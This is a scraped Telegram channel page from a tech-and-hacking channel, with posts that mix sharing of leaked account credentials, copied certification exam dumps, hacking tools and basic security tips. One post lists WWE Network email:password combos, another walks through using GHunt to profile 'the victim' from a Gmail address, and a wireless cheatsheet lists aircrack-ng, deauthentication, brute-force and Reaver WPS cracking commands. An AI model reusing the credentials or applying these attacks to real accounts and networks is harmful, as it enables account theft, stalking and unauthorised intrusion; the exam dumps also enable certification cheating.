cookie

ما از کوکی‌ها برای بهبود تجربه مرور شما استفاده می‌کنیم. با کلیک کردن بر روی «پذیرش همه»، شما با استفاده از کوکی‌ها موافقت می‌کنید.

avatar

TECH RELIES UGANDA

The Tech Relies Uganda is concerned with fostering the development and application of real-time. A Usf Creation

نمایش بیشتر
کشور مشخص نشده استزبان مشخص نشده استدسته بندی مشخص نشده است
پست‌های تبلیغاتی
139
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز

در حال بارگیری داده...

معدل نمو المشتركين

در حال بارگیری داده...

🔰WWE Premium Accounts🔰 ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬ [email protected]:Bjustine1 [email protected]:paolab17 [email protected]:john0618 [email protected]:Southern11 [email protected]:eilloh2010 [email protected]:makaveli96 Expires On: 22 July, 2020 [27 Days Left] [email protected]:wildcat77 [email protected]:A101925b [email protected]:google1 [email protected]:cheyenne8 [email protected]:cheyenne8 [email protected]:shoebox1 [email protected]:chuckie75 [email protected]:smooth08 [email protected]:alexis101 [email protected]:nate1313 [email protected]:dylan0424 Expires On: 27 June, 2020 [1 Days Left] [email protected]:peaches1 [email protected]:bryson747 Expires On: 29 June, 2020 [3 Days Left] [email protected]:November26 [email protected]:acemaker123 [email protected]:Victor2012 [email protected]:illini15 [email protected]:nicole00 [email protected]:kilee2009 ▬▬ Share & Support ▬▬
نمایش همه...
CompTIA A+ 220-1002 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1o_PYf0s2qcNu9SJ7aXlT7GNvdU9nJ5uB/view?usp=sharing CompTIA A+ 220-1001 Real Exam Question & Answers - PDF https://drive.google.com/file/d/1mcpynigF_-k_ad-IHX3tozoeSPGQTzmH/view?usp=sharing CompTIA Network+ N10-007 Real Exam Questions & Answers - PDF https://drive.google.com/open?id=1JYm9fuwJGcwOu-4pWS5GWvSq8e3tswBq CompTIA Security+ SY0-501 Exam Q&A - PDF https://drive.google.com/open?id=10pcS5ZPypuS5yv7dUtU-9NdyAJFKd8RQ CompTIA PenTest+ Certification PT0-001 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1bfI0JDFI_drWdAILC-G769CkKbfsIG6N/view?usp=sharing CompTIA JK0-019 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1r87rQv4Wtf2jTQ0rIIbQIpH_IXZe5CJW/view?usp=sharing Cisco CCNA 200-301 Exam Questions & Answers - PDF https://drive.google.com/file/d/17gX0pku5oqYOAyW7uo9TD57qjIibvkA8/view?usp=sharing Cisco CCNP Enterprise ENCOR (350-401) Real Exam Q&A - PDF https://drive.google.com/file/d/1xewAuc1_gngP5VJk6TUqwK1lPTyyYvrt/view?usp=sharing CCNP & CCIE Security SCOR 350-701 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1o8QWQ19_J3zhC7f5GMdqBrTHQOwJemef/view?usp=sharing CCNP & CCIE DCCOR 350-601 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/10HZI0bamMu0bt0xkJZMOXMiabYqqY56Y/view?usp=sharing Cisco 300-610 DCID Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1jqVjVEcc_jV9d3zEUHNc3KBsi549cGCw/view?usp=sharing Cisco CCT Data Center 010-151 DCTECH Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1FDMz7DxtAko9Kvl61ZGWMh69_YoThRmW/view?usp=sharing CISSP Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1609F3vQJRqkaTTlobhzxlDKgBHv93BKF/view?usp=sharing Microsoft Azure AZ-900 Real Exam Questions & Answers 2020 - PDF https://drive.google.com/open?id=1zopfQm-EBMtsY2la-3xq8_jwEqmUJ2PJ Microsoft AZ-500 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1wmxbdjLYgFYyLCcvUn6Kd1DdjclF5cOl/view?usp=sharing MS-900 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1cI-one9sXNyzE4lyoRPPiTp8U_LHOLQ7/view?usp=sharing Microsoft MD-100 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1HHF47GB5VDyt6298sG05WmtjyMt--Q9N/view?usp=sharing MS-500 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1xQzpYM1HTkaU6ENSH-zW_1QQIwzN-oF1/view?usp=sharing AZ-203 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1PUc_LQVypwUn0BoupYnnunUGOQBUISmf/view?usp=sharing MCSA 70-768 Real Exam Questions & Answers - PDF https://drive.google.com/file/d/1VwC-BvwYADLJ03N6BuzPDItUa5gyvgbi/view?usp=sharing share and support us♻
نمایش همه...
CompTIA A+ 220-1002 Real Exam Questions & Answers - PDF.pdf

🔔 Network scanning and enumeration 👁 ابزارهای اسکن شبکه 🔻1.DMitry DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU) Linux command-line application that was coded in C programming language. DMitry can assemble as much data as could be expected about a host. The basic functionality of this tool is to gather possible subdomains, email addresses, uptime information, TCP port scan, Whois lookups, and more. 🔻2.Hping3 Hping is a free command-line packet generator and analyzer for the TCP/IP convention created by Salvatore Sanfilippo. It is one type of analyzer for network security, security auditing, and testing of firewalls and networks. This tool is also utilized to exploit the idle-scan scanning technique, which is presently implemented in the Nmap Scanner. Hping doesn’t send only ICMP echo requests but also supports TCP, UDP, ICMP, and RAW-IP protocols. It has a traceroute mode, the ability to send files between a covered channel, and many other features. 🔻3.Sparta Sparta is a python based GUI application that streamlines network infrastructure penetration testing by helping the security analyzer in scanning and enumeration stage. 🔻4.Sandmap Sandmap is a tool supporting network and framework surveillance utilizing the massive Nmap searching motor. For more information, please visit the “https://github.com/trimstray/sandmap” GitHub page. 🔻5. Nmap Nmap “Network Mapper” is a free and open-source tool used for network discovery and security auditing.
نمایش همه...
trimstray/sandmap

Nmap on steroids. Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles. - trimstray/sandmap

​​🔰We can receive information about the victim by gmail mail 🔰 I want to tell you about a very cool osynt tool for collecting information from mail. This is the data you will receive with only mail: - Owner's name - Date of last edit - Google id - Activated Google services ( - Possible YouTube channel - Possible names - Public photos - Phone models - Firmware phones - Installed software - Reviews about Google Maps - Possible physical location Installation takes place in the terminal To do this, we enter into Termux one by one: apt update apt upgrade apt install git python git clone https://github.com/mxrch/GHunt pip3 install -r requirements.txt python check_and_gen.py And like this, we start the search by mail: python hunt.py [email protected]
نمایش همه...
mxrch/GHunt

🕵️‍♂️ Investigate Google emails and documents. Contribute to mxrch/GHunt development by creating an account on GitHub.

Should we drop NV filess?Anonymous voting
  • Yes, Definitely
  • No, no need
0 votes
😍 FREE COURSES COLLECTION 😍 1. [2021] R Programming: R for Data Science 14 Courses in 1 Rating: 4.3 out of 5 Duration: 6 hours https://www.udemy.com/course/r-programming-a-z-r-for-data-science-and-statistics/?couponCode=PROGRAM13 2. The Complete HTML5 Course: From Beginning to Expert Rating: 4.3 out of 5 Duration: 5 hours https://www.udemy.com/course/interactive-html-course/?couponCode=HTML5JAN2021 3. HTML, JavaScript, & Bootstrap - Certification Course Rating: 4.3 out of 5 Duration: 6.5 hours https://www.udemy.com/course/html-javascript-bootstrap-certification-course/?couponCode=YOUACCEL10586 4. The Comprehensive Guide To Logistics & Supply Chain Duration: 2 hours https://www.udemy.com/course/the-comprehensive-guide-to-logistics-supply-chain/?couponCode=KNOWLEDGEHUB 5. Quit smoking for good! Rating: 5.0 out of 5 Duration: 2.5 hours https://www.udemy.com/course/quit-smoking-for-good/?couponCode=QUIT_SMOKING 6. Quantity Surveying Templates for Effective Cost Management Rating: 4.4 out of 5 Duration: 1.5 hours https://www.udemy.com/course/quantity-surveying-templates-for-effective-cost-management/?couponCode=QSJAN2021FREE 7. Become Memory Genius by Modern Neuro Science NLP https://www.udemy.com/course/become-memory-genius-by-modern-neuro-science-nlp/ 8. Zero to Hero in Microsoft Excel: Complete Excel guide 2021 Rating: 4.4 out of 5 Duration: 6 hours https://www.udemy.com/course/excel-quick-start-guide-from-beginner-to-expert/?couponCode=JANXII21 9. Tools for Working From Home - Google Apps, Trello & Zoom Rating: 4.1 out of 5 Duration: 3 hours https://www.udemy.com/course/essential-tools-for-working-remotely-google-apps/?couponCode=JANXII21 10. The Making of our Modern World - Part 1 Rating: 3.9 out of 5 Duration: 3 hours https://www.udemy.com/course/the-making-of-our-modern-world-part-1/?couponCode=MODERN_WORLD ENJOY LEARNING👍👍
نمایش همه...
Online Courses - Anytime, Anywhere | Udemy

Udemy is the world's largest destination for online courses. Discover an online course on Udemy.com and start learning a new skill today.

📶 Wireless Testing Cheatsheet 📶 WEP attack with aircrack-ng suite airmon-ng start wlan0 <AP Channel> airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon aireplay-ng -3 -b <AP MAC> -h <Attacker MAC> wlan0mon # ARP Replay aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> wlan0mon aircrack-ng -0 <filename.cap> airmon-ng start wlan0 <AP Channel> airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon aireplay-ng -1 0 -e <AP ESSID> -a <AP MAC> -h <Attacker MAC> wlan0mon aireplay-ng -5 -b <AP MAC> -h <Attacker MAC> wlan0mon packetforge-ng -0 -a <AP MAC> -h <Attacker MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <packet filename> tcpdump -n -vvv -e -s0 -r <packet filename> aireplay-ng -2 -r <packet filename> wlan0mon aircrack-ng -0 <filename> WPA PSK attack with aircrack-ng suite. airmon-ng start wlan0 <AP Channel> airodump-ng -c <AP Channel> --bssid <AP MAC> -w <filename> wlan0mon aireplay-ng -0 1 -a <AP MAC> -c <Victim MAC> wlan0mon aircrack-ng -0 -w <wordlist> <capture file> You can capture the handshake passively (it takes time) or de-authenticate a client. De-authentication attack aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0 Deauth every client - aireplay-ng -0 5 -a <bssid> mon0 Dictionary Attack aircrack-ng -w passwords.lst capture-01.cap Brute force Attack crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap CoWPAtty Attack Wordlist mode: cowpatty -r <Capture file> -f <wordlist> -2 -s <AP ESSID> PMK mode: genpmk -f <wordlist> -d <hash filename> -s <AP ESSID> cowpatty -r <Capture file> -d <hash filename> -2 -s <AP ESSID> Rogue Access Point Testing # ifconfig wlan0 down # iw reg set BO # iwconfig wlan0 txpower 0 # ifconfig wlan0 up # airmon-ng start wlan0 # airodump-ng --write capture mon0 ifconfig wlan1 down iw reg set BO ifconfig wlan1 up iwconfig wlan1 channel 13 iwconfig wlan1 txpower 30 iwconfig wlan1 rate 11M auto Reaver airmon-ng start wlan0 airodump-ng wlan0 reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 Pixie WPS airmon-ng check airmon-ng start wlan0 airodump-ng wlan0mon --wps reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 Wireless Notes Wired Equivalent Privacy (WEP) RC4 stream cipher w/ CRC32 for integrity check - Attack: By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. - Remediation: Use WPA2 Wifi Protected Access (WPA) Temporal Key Integrity Protocol (TKIP) Message Integrity Check - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: Use long-keys Wifi Protected Access 2 (WPA2) Advanced Encryption Standard (AES) - Attack: Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. - Remediation: WPA-Enterprise
نمایش همه...
I hope this is superfluous information, but NEVER click on a link sent to you in an email. I don't care if it came from what appears to be trusted source, such as your bank or friend, NEVER click on a link in your email. It is so easy t.me/Tech_Relies_Uganda
نمایش همه...
TECH RELIES UGANDA

The Tech Relies Uganda is concerned with fostering the development and application of real-time. A Usf Creation

How To Protect Yourself from being hacked !! Those are just the big ones that get reported in the news. Millions take place every year that are not reported. Despite that, the public is suffering from "security breach fatigue." No one seems to care anymore. As the public becomes "dulled" to the importance of these breaches, they are more likely to ignore some basic measures to protect their systems. As someone responsible for my share of "breaches," I would like to offer you some simple ways that you prevent yourself from becoming a victim of these types of hacks. Keep in mind that nothing will protect you 100% from all attacks. The only way to assure that is to take your machine offline, and no one wants to do that. There so many ways to attack an online computer that if someone is determined to hack you, and they have the knowledge and skills, they are likely to get in. What you can do, though, is make it as difficult as possible for the random fly-by hacker to get into your system and instead target their efforts to someone who is much easier to victimize. One of the first things you need to understand is that hackers are constantly scanning the world for vulnerable systems. They simply write a little program or script to scan every IP address on the planet looking for a particular known vulnerability or two. When they find that your system has that vulnerability, then they begin the attack. If your system doesn't come up on their radar, they will simply pass you by and look at the next online computer. Here are few common sense measures to keep yourself from being hacked. I've tried to arrange them from the most basic to the more advanced. Obviously, the more of these measures your implement, the less the chance that you will be hacked. Note: I use the term "malware" here to indicate any type of bad (malicious) software. This includes viruses, trojans, worms, adware, rootkits, etc. Rather than trying to make distinctions between each of these types of software, I prefer the all-encompassing term malware. Step 1 Use Stronger Passwords Password are your first line of defense in this digital war between hackers and the potential victims. If I can get your password, the rest is easy. Most people use simple-to-crack passwords that anyone of my ilk could decipher in minutes or hours at most. Rather than go into great lengths here about how to protect your password, I direct your attention to my recently posted article on creating stronger passwords.  "I<3mtnb1K1ng&H1k1ng" may not be an impossible passphrase to crack, but it's definitely harder.Image via Shutterstock Step 2Use Two-Factor Authentication Nearly all computers and all systems (home security systems, car lock, garage door opener, iCloud, etc.) require a username and password to authenticate. To authenticate means to prove who you are. More secure systems are now using two-factor authentication, the first factor being your password. Authentication factors are generally broken down into three categories; What you know (passwords) What you have What you are (biometrics) By requiring a second authentication factor, you can make it MUCH harder for me to hack your system. Cracking passwords, no matter how complex, can ALWAYS be cracked given enough time and resources. By requiring a second factor such as your fingerprint, though, it makes it much more difficult for hackers. Impersonating your fingerprint is not impossible, but far more difficult than cracking your password. Other potential two-factor authentication systems that many companies and military organizations are using is some type of token (something I have). This is usually some smart card that identifies the user. Although neither method is perfect, the combination makes you much safer from hackers like me. Step 3 Never, Ever Click on a Suspicious Link
نمایش همه...
نمایش همه...

MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now